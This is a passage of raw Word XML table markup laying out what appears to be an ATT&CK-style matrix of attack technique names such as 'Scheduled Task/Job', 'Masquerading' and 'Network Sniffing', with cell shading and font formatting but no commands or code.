              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="527A1AD6" w14:textId="1CAC57E3" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Pre-OS Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="316470B0"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7543EDD2" w14:textId="743308E7" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Impersonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A0781FB"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1D125B38" w14:textId="775CDE5A" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64422F6F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A22A916" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EBDA32E" w14:textId="636DFDA2" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Web Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C2A1505" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05753DA8" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="5F61C442" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71862E67" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43AF2911"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31C75090" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="466A608E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A0702EC" w14:textId="1AB4709D" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A0801AE"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20356A6C" w14:textId="64E9897D" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Indicator Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C406E9A"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0EDFDAB9" w14:textId="40CB23F2" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Password Policy Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CD69757" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F78BDEC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="261ACDFE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D5D5925" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3131D269" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="4112AD91" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44B30812" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23496A31"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527B907F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="696348E7" w14:textId="63A9BC23" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20F0ADEC" w14:textId="17510603" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Server Software Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C4CEEB5"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E6E6388" w14:textId="6E4C7F1D" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Indirect Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BED20B7"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430CCAD2" w14:textId="4C2EE17E" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Peripheral Device Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CCDB8EC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B3C1F62" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C8CD0CA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31329539" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C937C40" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="038A98C1" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04997982" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ED71DF0"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6DA42C05" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E399F9F" w14:textId="01A37139" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13AD6E81" w14:textId="1A6065CD" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Software Extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F75193C"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4A5612D9" w14:textId="07B55B4C" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="631DF901"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0FE683F7" w14:textId="3D8D6BCD" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Permission Groups Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19616417" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4849732A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44D3DD90" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EE7A5D9" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67D222B6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="64C78F68" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7712E885" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B6F304D"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639CC8B8" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
